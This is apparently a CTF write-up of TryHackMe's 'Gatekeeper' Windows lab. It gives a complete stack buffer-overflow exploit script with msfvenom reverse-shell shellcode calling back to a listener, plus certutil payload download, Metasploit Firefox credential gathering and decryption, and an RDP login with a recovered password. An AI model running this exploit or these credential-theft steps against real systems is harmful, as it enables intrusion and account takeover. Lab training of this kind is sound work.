
tryhackme-Gatekeeper

Posted: 2024-07-14 17:41:26
Tags: Gatekeeper, Windows, tcp, payload, x20, open, Hello, tryhackme

Information gathering

First, port-scan the target with nmap. The commands actually run (the targets, port lists and script names match the logs below) and their results:

nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
nmap -sV -O -A --min-rate 10000 -p 135,139,445,3389,31337,49152-49155,49163-49164 -oA version 10.10.130.100
nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p 135,139,445 -oA 445Port 10.10.130.100
# Nmap 7.94SVN scan initiated Sat Jul 13 23:05:09 2024 as: nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
Warning: 10.10.130.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.130.100
Host is up (0.24s latency).
Not shown: 65262 closed tcp ports (conn-refused), 262 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
31337/tcp open  Elite
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49163/tcp open  unknown
49164/tcp open  unknown

# Nmap done at Sat Jul 13 23:05:39 2024 -- 1 IP address (1 host up) scanned in 30.48 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:07:13 2024 as: nmap -sV -O -A --min-rate 10000 -oA version -p 135,139,445,3389,31337,49152-49155,49163-49164 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
|_ssl-date: 2024-07-14T03:10:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-07-13T03:05:08
|_Not valid after:  2025-01-12T03:05:08
| rdp-ntlm-info: 
|   Target_Name: GATEKEEPER
|   NetBIOS_Domain_Name: GATEKEEPER
|   NetBIOS_Computer_Name: GATEKEEPER
|   DNS_Domain_Name: gatekeeper
|   DNS_Computer_Name: gatekeeper
|   Product_Version: 6.1.7601
|_  System_Time: 2024-07-14T03:10:08+00:00
31337/tcp open  Elite?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|     Hello
|   GenericLines: 
|     Hello 
|     Hello
|   GetRequest: 
|     Hello GET / HTTP/1.0
|     Hello
|   HTTPOptions: 
|     Hello OPTIONS / HTTP/1.0
|     Hello
|   Help: 
|     Hello HELP
|   Kerberos: 
|     Hello !!!
|   LDAPSearchReq: 
|     Hello 0
|     Hello
|   LPDString: 
|     Hello 
|     default!!!
|   RTSPRequest: 
|     Hello OPTIONS / RTSP/1.0
|     Hello
|   SIPOptions: 
|     Hello OPTIONS sip:nm SIP/2.0
|     Hello Via: SIP/2.0/TCP nm;branch=foo
|     Hello From: <sip:nm@nm>;tag=root
|     Hello To: <sip:nm2@nm2>
|     Hello Call-ID: 50000
|     Hello CSeq: 42 OPTIONS
|     Hello Max-Forwards: 70
|     Hello Content-Length: 0
|     Hello Contact: <sip:nm@nm>
|     Hello Accept: application/sdp
|     Hello
|   SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|_    Hello
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49163/tcp open  msrpc          Microsoft Windows RPC
49164/tcp open  msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94SVN%I=7%D=7/13%Time=669340EF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\
SF:x20Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:n
SF:m@nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-
SF:ID:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-F
SF:orwards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Conta
SF:ct:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHell
SF:o\x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(
SF:HTTPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!
SF:\n")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x
SF:20\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x
SF:20\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSS
SF:essionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(
SF:FourOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2
SF:ebak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x0
SF:1default!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!
SF:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:aa:d3:b1:8d (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: gatekeeper
|   NetBIOS computer name: GATEKEEPER\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-13T23:10:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s
| smb2-time: 
|   date: 2024-07-14T03:10:07
|_  start_date: 2024-07-14T03:05:02

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   249.25 ms 10.9.0.1
2   249.34 ms 10.10.130.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 13 23:10:14 2024 -- 1 IP address (1 host up) scanned in 181.09 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:10:30 2024 as: nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p135,139,445 -oA /home/kali/Gatekeeper/445Port 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.130.100\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.130.100\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.130.100\Users: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ

# Nmap done at Sat Jul 13 23:11:22 2024 -- 1 IP address (1 host up) scanned in 52.26 seconds

The scan shows that the ports useful to us are 445, 3389 and 31337. Two details from the SMB host scripts are also worth noting: the guest account is accepted (account_used: guest) and the Users share is readable by it, and SMB message signing is enabled but not required.
The guest-readable Users share on 445 is the leak: connecting to it reveals a program, gatekeeper.exe, which we download.

Run it in a local Windows VM.

It goes into a listening state, so it must open a port. Given the scan result, the guess is that this program is what listens on 31337; confirm with netstat -an -p tcp.

Connect with nc and look at it.

The program echoes whatever is sent back as "Hello <input>", so it may have a stack overflow. Connect to port 31337 on the target to check whether it behaves the same way.

It is the same program.

The plan from here is to debug the stack overflow in a debugger and exploit it. The steps are the standard ones learned earlier, so they are only sketched here.

Vulnerability debugging

I wrote a simple fuzzing script with pwntools:

import time
from pwn import *
# context(log_level="debug")


# Grow the input by 50 bytes per round until the service stops answering;
# the last length that still got a reply brackets the crash length.
padding = b"A" * 50
while True:
    try:
        p = remote("192.168.226.132", 31337, timeout=5)
        p.sendline(padding)
        print(f"send {len(padding)} bytes Test!")
        p.recv(timeout=5)   # the service echoes "Hello <input>"; a crash shows up as EOF or a timeout
        p.close()
    except Exception as e:
        print(f"at {len(padding)} bytes error: {e}")
        break
    padding += b"A" * 50
    time.sleep(1)

Each round sends 50 more bytes than the previous one. Start gatekeeper.exe under the debugger (the mona commands used below are Immunity Debugger's), then run the script.

Run the script.


The script stalls at 150 bytes. Next, find exactly which bytes land in EIP. I wrote another script for that:

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b""   # paste the msf-pattern_create output here

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

Generate a 150-byte pattern with msf-pattern_create -l 150 and paste it into the payload += b"" line:

from pwn import *
context(log_level='debug')

offset = 0
payload = b"A" * offset
payload += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"

p = remote("10.10.163.211",31337)
p.sendline(payload)

p.recv()

Restart the program in the debugger and run the script.

Copy the EIP value from the debugger and look it up with msf-pattern_offset -l 150 -q <EIP>:


The offset to the saved return address is 146; set the offset variable to this value:

offset = 146
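How msf-pattern_create and msf-pattern_offset arrive at 146, as an added example that is not part of the original post: the functions below regenerate the same 150-byte pattern in pure Python and recover the offset from an EIP value. The EIP value 0x39654138 used in the demonstration is an assumption (it is what a 150-byte pattern produces at offset 146); the page itself only states the resulting offset.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def msf_pattern(length: int) -> bytes:
    """Reproduce msf-pattern_create: 3-byte chunks Aa0 Aa1 ... Aa9 Ab0 ... Zz9,
    the digit cycling fastest, truncated to `length` bytes."""
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds the 20280-byte maximum")


def pattern_offset(eip: int, length: int) -> int:
    """Reproduce msf-pattern_offset -q: the saved return address is a 32-bit
    little-endian store, so the EIP value read in the debugger is four pattern
    bytes in reverse order. Pack it back and search the pattern for them."""
    needle = struct.pack("<I", eip)
    pos = msf_pattern(length).find(needle)
    if pos < 0:
        raise ValueError(f"{eip:#010x} not found in a {length}-byte pattern")
    return pos


if __name__ == "__main__":
    pattern = msf_pattern(150)
    print(pattern.decode())
    # Assumed debugger reading for this pattern; see the lead-in.
    eip = 0x39654138
    print(f"EIP {eip:#010x} = bytes {struct.pack('<I', eip)!r} -> offset {pattern_offset(eip, 150)}")
```

The same `pattern_offset` works for any register that ends up holding pattern bytes (ESP, for instance, to see how far into the buffer the stack pointer lands after the return).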

Next, remove the pattern from the script and add a payload += b"BBBB" line:

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

Restart the program and run the script again. This is the EIP-control check: EIP should now be overwritten with 42424242.


Success. Next, generate a byte array of every value except \x00 and use it to test for bad characters:

!mona bytearray -b "\x00"


Append the byte array to the payload:

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset
payload += b"BBBB"
payload += (
	b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
	b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
	b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
	b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
	b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
	b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
	b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
	b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

Restart the program and run the script again.


Copy the ESP value and have mona compare memory at that address with the byte array file:

!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 009E19E4
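What `!mona compare` is doing, as an added example that is not the page's code: send a byte array, diff it against what actually landed in memory, exclude the first byte that broke the copy, and repeat until the array survives intact. The target is modelled by a constructed `simulated_line_reader` that stops at the first newline; that is an assumption about gatekeeper.exe's input handling, chosen so the loop reproduces the page's result of \x00 and \x0a. On the real target that function is replaced by sending the array and dumping memory at ESP.

```python
BAD_KNOWN = (0x00,)   # \x00 is excluded up front, as the page's mona bytearray does


def byte_array(exclude=()):
    """Every byte value 0x00..0xff except the ones already known to be bad
    (what `!mona bytearray -b "..."` writes to bytearray.bin)."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


def first_corruption(sent, observed):
    """What `!mona compare` reports: the first position where the bytes found
    in memory differ from the bytes that were sent, as (index, byte_sent).
    Returns None when the whole array survived intact."""
    for i, (s, o) in enumerate(zip(sent, observed)):
        if s != o:
            return i, s
    if len(observed) < len(sent):        # copy stopped early: the next byte was never written
        return len(observed), sent[len(observed)]
    return None


def discover_bad_chars(copy_to_target, known=BAD_KNOWN, max_rounds=16):
    """Iterate the send / compare / exclude loop until memory matches what was
    sent. `copy_to_target` stands in for "send the array, then dump ESP in the
    debugger"; on a real target it is the round trip through the service."""
    bad = list(known)
    for _ in range(max_rounds):
        sent = byte_array(bad)
        hit = first_corruption(sent, copy_to_target(sent))
        if hit is None:
            return sorted(bad)
        index, byte = hit
        print(f"corruption at offset {index}: {byte:#04x} is a bad character")
        bad.append(byte)
    raise RuntimeError("still finding bad characters after max_rounds rounds")


def simulated_line_reader(data):
    """Constructed model of the target (an assumption, not reverse-engineered
    from the binary): input is read up to the first newline, so everything
    from \\x0a onward never reaches the buffer, and stale stack contents
    (0xff filler here) sit where the rest of the array should be."""
    cut = data.find(b"\n")
    if cut < 0:
        return bytes(data)
    return bytes(data[:cut]) + b"\xff" * (len(data) - cut)


if __name__ == "__main__":
    print("bad characters:", [f"{b:#04x}" for b in discover_bad_chars(simulated_line_reader)])
```

One round per bad character is the same cadence as the manual mona workflow: each `!mona compare` only tells you about the first byte that broke the copy, which is why the array must be regenerated and re-sent after every exclusion.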


The bad characters are \x00 and \x0a. Next, look for a jmp esp gadget whose address avoids them:

!mona jmp -r esp -cpb "\x00\x0a"


Store the address little-endian in place of BBBB (0x080414c3 becomes \xc3\x14\x04\x08):

payload += b"\xc3\x14\x04\x08"	# 0x080414c3 

Then generate the shellcode, encoded to avoid the bad characters, and append it to the payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.226.131 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c

The encoder's decoder stub needs a little slack at the top of the stack, so put a short NOP sled (\x90) in front of the shellcode. The final script:

from pwn import *
context(log_level='debug')

offset = 146
payload = b"A" * offset            # filler up to the saved return address
payload += b"\xc3\x14\x04\x08"	# 0x080414c3 jmp esp, little-endian
payload += b"\x90" * 16            # NOP sled: slack for the decoder stub
payload += (
	b"\xdb\xc2\xba\xdb\x7f\xc7\xbd\xd9\x74\x24\xf4\x5b\x31\xc9"
	b"\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x88\x6c\x25\x48\xd2"
	b"\x7b\x2b\xb3\x2a\x7c\x4c\x3d\xcf\x4d\x4c\x59\x84\xfe\x7c"
	b"\x29\xc8\xf2\xf7\x7f\xf8\x81\x7a\xa8\x0f\x21\x30\x8e\x3e"
	b"\xb2\x69\xf2\x21\x30\x70\x27\x81\x09\xbb\x3a\xc0\x4e\xa6"
	b"\xb7\x90\x07\xac\x6a\x04\x23\xf8\xb6\xaf\x7f\xec\xbe\x4c"
	b"\x37\x0f\xee\xc3\x43\x56\x30\xe2\x80\xe2\x79\xfc\xc5\xcf"
	b"\x30\x77\x3d\xbb\xc2\x51\x0f\x44\x68\x9c\xbf\xb7\x70\xd9"
	b"\x78\x28\x07\x13\x7b\xd5\x10\xe0\x01\x01\x94\xf2\xa2\xc2"
	b"\x0e\xde\x53\x06\xc8\x95\x58\xe3\x9e\xf1\x7c\xf2\x73\x8a"
	b"\x79\x7f\x72\x5c\x08\x3b\x51\x78\x50\x9f\xf8\xd9\x3c\x4e"
	b"\x04\x39\x9f\x2f\xa0\x32\x32\x3b\xd9\x19\x5b\x88\xd0\xa1"
	b"\x9b\x86\x63\xd2\xa9\x09\xd8\x7c\x82\xc2\xc6\x7b\xe5\xf8"
	b"\xbf\x13\x18\x03\xc0\x3a\xdf\x57\x90\x54\xf6\xd7\x7b\xa4"
	b"\xf7\x0d\x2b\xf4\x57\xfe\x8c\xa4\x17\xae\x64\xae\x97\x91"
	b"\x95\xd1\x7d\xba\x3c\x28\x16\x05\x68\xd0\x65\xed\x6b\x14"
	b"\x7b\xb2\xe2\xf2\x11\x5a\xa3\xad\x8d\xc3\xee\x25\x2f\x0b"
	b"\x25\x40\x6f\x87\xca\xb5\x3e\x60\xa6\xa5\xd7\x80\xfd\x97"
	b"\x7e\x9e\x2b\xbf\x1d\x0d\xb0\x3f\x6b\x2e\x6f\x68\x3c\x80"
	b"\x66\xfc\xd0\xbb\xd0\xe2\x28\x5d\x1a\xa6\xf6\x9e\xa5\x27"
	b"\x7a\x9a\x81\x37\x42\x23\x8e\x63\x1a\x72\x58\xdd\xdc\x2c"
	b"\x2a\xb7\xb6\x83\xe4\x5f\x4e\xe8\x36\x19\x4f\x25\xc1\xc5"
	b"\xfe\x90\x94\xfa\xcf\x74\x11\x83\x2d\xe5\xde\x5e\xf6\x05"
	b"\x3d\x4a\x03\xae\x98\x1f\xae\xb3\x1a\xca\xed\xcd\x98\xfe"
	b"\x8d\x29\x80\x8b\x88\x76\x06\x60\xe1\xe7\xe3\x86\x56\x07"
	b"\x26"
)

p = remote("192.168.226.132",31337)
p.sendline(payload)

p.recv()

Restart the program, listen on port 4444 (nc -lvnp 4444), run the script and catch the reverse shell.
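The layout the final script sends, as an added example that is not part of the original post: build the payload from the numbers established above (offset 146, jmp esp at 0x080414c3, bad characters \x00 and \x0a), pack the address little-endian, and refuse to assemble anything that contains a bad character. The shellcode here is a constructed placeholder (int3 breakpoints) so the block runs offline; the msfvenom output from the page goes in its place. `send_payload` uses a plain socket instead of pwntools and is only run when the block is executed directly.

```python
import socket
import struct

BAD_CHARS = b"\x00\x0a"
OFFSET = 146              # filler bytes before the saved return address
JMP_ESP = 0x080414C3      # jmp esp found with !mona jmp -r esp -cpb "\x00\x0a"
NOP_SLED = 16

# Constructed placeholder so the block runs offline: eight int3 instructions,
# which stop the debugger when control reaches ESP. Replace with msfvenom output.
SHELLCODE = b"\xcc" * 8


def pack_addr(addr: int) -> bytes:
    """x86 is little-endian: the overwrite must store the low byte first."""
    return struct.pack("<I", addr)


def contains_bad(data: bytes, bad: bytes = BAD_CHARS) -> bool:
    return any(b in data for b in bad)


def build_payload(offset=OFFSET, ret=JMP_ESP, shellcode=SHELLCODE,
                  nops=NOP_SLED, bad=BAD_CHARS) -> bytes:
    """filler | saved-EIP overwrite | NOP sled | shellcode.
    After `ret` executes, ESP points just past the overwritten return address,
    i.e. at the NOP sled, which is why a jmp esp gadget lands in it."""
    ret_bytes = pack_addr(ret)
    if contains_bad(ret_bytes, bad):
        raise ValueError(f"return address {ret:#010x} contains a bad character")
    if contains_bad(shellcode, bad):
        raise ValueError("shellcode contains a bad character; re-encode it")
    payload = b"A" * offset + ret_bytes + b"\x90" * nops + shellcode
    assert not contains_bad(payload, bad)
    return payload


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Deliver the payload the way the page's pwntools scripts do (sendline):
    the trailing \\n is the one newline the target's line reader is meant to see."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload + b"\n")
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    p = build_payload()
    print(f"{len(p)} bytes; EIP bytes at {OFFSET}: {p[OFFSET:OFFSET + 4].hex()}")
    # Assumed local debugging VM address from the page; uncomment to fire it.
    # print(send_payload("192.168.226.132", 31337, p))
```

Validating the return address against the bad-character list is the check that `!mona jmp -r esp -cpb` performs for you; doing it again at build time catches the case where the address or the shellcode is changed later and the list is forgotten.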

Getting the flag

The same script works against the target with two changes: point remote() at the target's IP, and regenerate the shellcode with msfvenom using your VPN (tun0) address as LHOST, because the connect-back address is baked into the shellcode.

Read user.txt.

Privilege escalation

Although this part did not succeed, here is my approach. The reverse shell could have been generated as a meterpreter payload directly, but I generated a plain shell, so I needed to upgrade to a meterpreter session.
So I generated a shell.exe, served it with python -m http.server 80, downloaded it on the target with certutil -split -f -urlcache, and got a meterpreter session.

Then I tried post/multi/recon/local_exploit_suggester to look for possible privilege escalation exploits.

Trying the last one did not give me a shell; I don't know why.

winPEAS then produced no output, and manual enumeration turned up nothing usable, so I was stuck. A reference write-up pointed to credentials saved in Firefox.
Use the post/multi/gather/firefox_creds module to collect the credential files:


I renamed the downloaded files (firefox_decrypt expects a profile directory containing key4.db and logins.json).

Next, a script from GitHub decrypts these credentials: https://github.com/unode/firefox_decrypt/blob/main/firefox_decrypt.py
Running it gives the credentials of the mayor user:

python firefox_decrypt.py ./firefox

The ./firefox directory holds all of the exported credential files.

Then connect to the target over RDP with xfreerdp:

xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /sec:rdp /v:10.10.163.211 +clipboard

Get root.txt.

End of the exercise. Both footholds here are as much configuration problems as code problems: a guest-readable share leaked the binary that gave the first shell, and browser-saved credentials that can be decrypted offline gave the administrator's RDP login.

From: https://www.cnblogs.com/Junglezt/p/18301641
